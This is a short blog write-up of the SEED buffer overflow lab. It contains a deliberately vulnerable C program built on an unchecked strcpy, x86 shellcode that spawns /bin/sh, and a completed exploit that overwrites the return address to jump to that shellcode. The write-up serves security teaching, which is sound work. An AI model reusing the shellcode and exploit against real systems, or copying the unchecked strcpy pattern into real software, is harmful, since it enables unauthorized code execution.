当前位置：网站首页>Buffer overflow vulnerability lab experiment record

Buffer overflow vulnerability lab experiment record

2022-07-24 16:46:00 【SakamataZ】

A buffer overflow attack experiment , It's not very difficult , Take advantage of C Stack pointer storage principle . Here is a brief record .

Experiment official website address ：http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Buffer_Overflow/

List of articles

Disable address randomization

Insert picture description here

Program source code

/* stack.c */

/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int bof(char *str)
{
    
    char buffer[24];

    /* The following statement has a buffer overflow problem */ 
    strcpy(buffer, str);

    return 1;
}

int main(int argc, char **argv)
{
    
    char str[517];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);

    printf("Returned Properly\n");
    return 1;
}

/* call_shellcode.c */

/*A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>

const char code[] =
  "\x31\xc0"             /* xorl %eax,%eax */
  "\x50"                 /* pushl %eax */
  "\x68""//sh"           /* pushl $0x68732f2f */
  "\x68""/bin"           /* pushl $0x6e69622f */
  "\x89\xe3"             /* movl %esp,%ebx */
  "\x50"                 /* pushl %eax */
  "\x53"                 /* pushl %ebx */
  "\x89\xe1"             /* movl %esp,%ecx */
  "\x99"                 /* cdq */
  "\xb0\x0b"             /* movb $0x0b,%al */
  "\xcd\x80"             /* int $0x80 */
;

int main(int argc, char **argv)
{
    
   char buf[sizeof(code)];
   strcpy(buf, code);
   ((void(*)( ))buf)( );
}

/* exploit.c */

/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
    "\x31\xc0"             /* xorl %eax,%eax */
    "\x50"                 /* pushl %eax */
    "\x68""//sh"           /* pushl $0x68732f2f */
    "\x68""/bin"           /* pushl $0x6e69622f */
    "\x89\xe3"             /* movl %esp,%ebx */
    "\x50"                 /* pushl %eax */
    "\x53"                 /* pushl %ebx */
    "\x89\xe1"             /* movl %esp,%ecx */
    "\x99"                 /* cdq */
    "\xb0\x0b"             /* movb $0x0b,%al */
    "\xcd\x80"             /* int $0x80 */
;

void main(int argc, char **argv)
{
    
    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);

    /* You need to fill the buffer with appropriate contents here */ 

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
}

obtain str Initial address

Insert picture description here
therefore shellcode It should be placed in 0xbffff177+0x64=0xbffff1db
Use gdb Obtained by disassembly bof The return address is 0x24

So the program code is ：

/* exploit.c */
 
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
    "\x31\xc0"             /* xorl %eax,%eax */
    "\x50"                 /* pushl %eax */
    "\x68""//sh"           /* pushl $0x68732f2f */
    "\x68""/bin"           /* pushl $0x6e69622f */
    "\x89\xe3"             /* movl %esp,%ebx */
    "\x50"                 /* pushl %eax */
    "\x53"                 /* pushl %ebx */
    "\x89\xe1"             /* movl %esp,%ecx */
    "\x99"                 /* cdq */
    "\xb0\x0b"             /* movb $0x0b,%al */
    "\xcd\x80"             /* int $0x80 */
;
 
void main(int argc, char **argv)
{
    
    char buffer[517];
    FILE *badfile;
 
    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);
 
    /* You need to fill the buffer with appropriate contents here */ 
    strcpy(buffer+100,shellcode);			// take shellcode Copy to buffer
    strcpy(buffer+0x24,"\xdb\xf1\xff\xbf");		// stay buffer The first four bytes at a specific offset cover sellcode Address 
    /* Save the contents to the file "badfile" */
	
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
}